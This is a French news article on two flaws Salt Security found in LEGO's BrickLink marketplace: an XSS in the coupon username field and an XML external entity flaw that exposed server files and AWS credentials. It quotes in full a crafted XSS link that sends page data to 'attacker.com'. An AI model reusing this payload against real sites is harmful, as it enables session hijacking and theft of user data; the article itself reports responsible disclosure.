sam. Jan 28th, 2023

La plateforme de trading BrickLink héberge les données de plus d’un million de fans LEGO fidèles. Une nourriture trouvée pour les cybercriminels.

Le marché LEGO, connu sous le nom de BrickLink, compte plus d’un million d’utilisateurs enregistrés et dispose donc d’un grand nombre de données d’utilisateurs qui pourraient intéresser les cybercriminels. Les experts en sécurité de Salt Security ont démontré à quel point l’accès peut être facile.

Les données de plus d’un million d’utilisateurs étaient menacées

Les chercheurs en sécurité de Salt Security ont découvert deux vulnérabilités dans l’API de la plateforme BrickLink de LEGO. Cela a parfois permis aux attaquants de prendre complètement le contrôle des comptes d’utilisateurs, d’accéder aux données personnelles et aux données de production internes et de compromettre les systèmes de serveur de la plateforme de trading.

BrickLink est le marché officiel du groupe LEGO. Il abrite également la plus grande communauté en ligne au monde pour les fans de LEGO, avec plus d’un million d’utilisateurs enregistrés.

Les chercheurs ont pu découvrir les vulnérabilités en expérimentant simplement des champs de saisie sur le site Web BrickLink. Par exemple, ils ont découvert qu’un lien spécialement conçu collé dans le « Trouver le nom d’utilisateur» de la section de recherche de coupons, permettant d’injecter et d’exécuter un code malveillant sur la machine d’un utilisateur de la plateforme.

Reprise de compte en un clic par les amoureux de LEGO

Les chercheurs ont pu reprendre la session d’une personne cible à l’aide de ce que l’on appelle le cross-site scripting (XSS) et ainsi accéder au compte d’utilisateur respectif. Tout ce dont ils avaient besoin, selon BleepingComputer, était l’identifiant de session de la victime connecté à BrickLink.

Voir aussi  Téléchargements de musique en octobre 2022 : des portails pour tous les styles musicaux

Pour les obtenir, les chercheurs ont créé un lien spécial :

https://bricklink.com/orderCoupons.asp?v=W&viewUsername=xss"onfocus="fetch('https://www.bricklink.com/v3/member/community_experts.page').then(response=>response.text()).then(data=>fetch('https://attacker.com',{method:'POST',mode: 'no-cors',body:data}));"+autofocus="

Dès qu’un utilisateur clique dessus, le code qui y est intégré lit automatiquement l’ID de session à partir de la requête d’un endpoint API de la plateforme LEGO et le transmet à un serveur fictif et contrôlé par l’attaquant.

En conséquence, les cybercriminels ont pu accéder à toutes les données disponibles dans le compte utilisateur BrickLink. Cela inclut les listes de souhaits, les historiques de messages, les coupons, les commandes passées, les adresses de livraison et les adresses e-mail.

Même les informations d’identification AWS n’étaient pas en sécurité avec LEGO

La deuxième vulnérabilité était liée à la fonction de BrickLink »Télécharger sur la liste des personnes recherchées“. Cela permet aux utilisateurs de télécharger des listes XML complètes de pièces LEGO qu’ils souhaitent rechercher sur la plate-forme.

Ici, les chercheurs ont réussi à utiliser des commandes spéciales pour que l’analyseur XML ouvre des fichiers système entiers à partir du serveur Web. Ils l’ont clairement indiqué dans leur rapport en demandant au serveur de lire le contenu complet du « /etc/passwd» à émettre. En fin de compte, les chercheurs en sécurité ont même pu obtenir ses données d’accès AWS EC2 à partir du système.

Après que Salt Security a signalé les découvertes à LEGO, la société a pris les mesures appropriées et a fermé les vulnérabilités mentionnées sur BrickLink.